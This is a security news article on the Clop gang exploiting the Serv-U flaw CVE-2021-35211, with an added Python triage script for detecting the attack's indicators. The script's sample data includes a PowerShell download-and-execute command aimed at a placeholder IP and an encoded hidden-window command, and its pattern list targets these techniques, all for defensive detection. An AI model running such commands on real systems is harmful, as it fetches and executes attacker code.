The Clop ransomware gang, also tracked as TA505 and FIN11, is exploiting a SolarWinds Serv-U vulnerability to breach corporate networks and ultimately encrypt its devices.
The Serv-U Managed File Transfer and Serv-U Secure FTP remote code execution vulnerability, tracked as CVE-2021-35211, allows a remote threat actor to execute commands on a vulnerable server with elevated privileges.
SolarWinds released an emergency security update in July 2021 after discovering “a single threat actor” exploiting it in attacks.
The company also warned that this vulnerability only affects customers who have enabled the SSH feature, which is commonly used to further protect connections to the FTP server.
According to a new report by the NCC Group, there’s been an uptick in Clop ransomware infections in the past couple of weeks, with most of them starting with the exploitation of CVE-2021-35211.
While the Clop gang is known to use vulnerabilities in their attacks, such as the Accellion zero-day attacks, the researchers state that TA505 more commonly uses phishing emails with malicious attachments to breach networks.
In the new attacks spotted by NCC, the threat actors exploit Serv-U to spawn a sub-process controlled by the attackers, thus enabling them to run commands on the target system.
This opens up the way for malware deployment, network reconnaissance, and lateral movement, essentially laying the ground for a ransomware attack.
A characteristic sign that this flaw has been exploited is exception errors in the Serv-U logs, generated when the vulnerability is triggered.
The exception error shown in logs will be similar to the following string:
Another sign of exploitation is traces of PowerShell command execution, which is used to deploy a Cobalt Strike beacon on the vulnerable system.
For persistence, the actors hijack a legitimate scheduled task that is used for regularly backing up registry hives and abuse the associated COM handler to load ‘FlawedGrace RAT.’
FlawedGrace is a tool that TA505 has been using since at least November 2017, and it remains a reliable part of the group’s arsenal.
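Triage logic for the three indicators described above (exception entries in the Serv-U log, PowerShell used to stage a beacon, and a COM-handler scheduled task whose DLL has been swapped), as an added example that is not from the article or from the NCC Group report. All log lines, command lines, task names and CLSID placeholders are constructed; the registry-backup task is assumed to be Windows' RegIdleBackup task, and the real Serv-U exception string is not reproduced.

```python
import re

# Indicator 1: exception errors in the Serv-U log. Sample lines are constructed;
# the real exception string from the NCC report is not reproduced here.
SERVU_LOG = [
    "[2021-10-14 09:12:03] SSH connection accepted from 198.51.100.23",
    "[2021-10-14 09:12:04] EXCEPTION: C0000005 while processing SSH packet",
    "[2021-10-14 09:15:10] User alice logged in via SFTP",
]
EXCEPTION_RE = re.compile(r"\bEXCEPTION\b.*\bSSH\b", re.IGNORECASE)

def servu_exceptions(lines):
    """Return log lines that record an exception in the SSH code path."""
    return [line for line in lines if EXCEPTION_RE.search(line)]

# Indicator 2: PowerShell used to stage a beacon. Constructed process command
# lines, as a 4688/Sysmon-style source would supply them.
PS_CMDLINES = [
    "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "powershell.exe -Command Get-Date",
    "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')\"",
]
PS_SUSPICIOUS = [r"-(enc|encodedcommand)\b", r"-w(indowstyle)?\s+hidden",
                 r"\bIEX\b", r"DownloadString|FromBase64String"]

def suspicious_powershell(cmdlines):
    """Return (command line, matched patterns) for lines hitting any indicator."""
    hits = []
    for cmd in cmdlines:
        matched = [p for p in PS_SUSPICIOUS if re.search(p, cmd, re.IGNORECASE)]
        if matched:
            hits.append((cmd, matched))
    return hits

# Indicator 3: a COM-handler scheduled task whose handler DLL no longer lives in
# System32. Values are constructed; the registry-backup task is assumed to be
# Windows' RegIdleBackup task, and the CLSIDs are placeholders.
# (task path, action kind, CLSID, DLL the CLSID's InprocServer32 key resolves to)
TASKS = [(r"\Microsoft\Windows\Registry\RegIdleBackup", "ComHandler",
          "{CLSID-PLACEHOLDER}", r"C:\ProgramData\update\loader.dll"),
         (r"\Example\BenignTask", "ComHandler", "{CLSID-PLACEHOLDER-2}",
          r"C:\Windows\System32\benign.dll")]

def hijacked_com_tasks(tasks):
    """Flag COM-handler tasks whose DLL resolves outside C:\\Windows\\System32."""
    return [t for t in tasks if t[1] == "ComHandler"
            and not t[3].lower().startswith("c:\\windows\\system32\\")]
```

On a live host the same functions take the Serv-U log file, process-creation command lines, and scheduled-task actions resolved through the CLSID's InprocServer32 registry value.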
NCC Group has posted the following handy checklist for system administrators who suspect compromise:
Despite the numerous alerts to apply the security update, many vulnerable Serv-U servers remain publicly accessible.
Most vulnerable Serv-U FTP instances are located in China, while the United States comes in second.
It’s been almost four months since SolarWinds released the security update for this vulnerability, but the percentage of potentially vulnerable Serv-U servers remains above 60%.
“In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers is still significant at 2784 (66.5%),” warn the researchers in their report.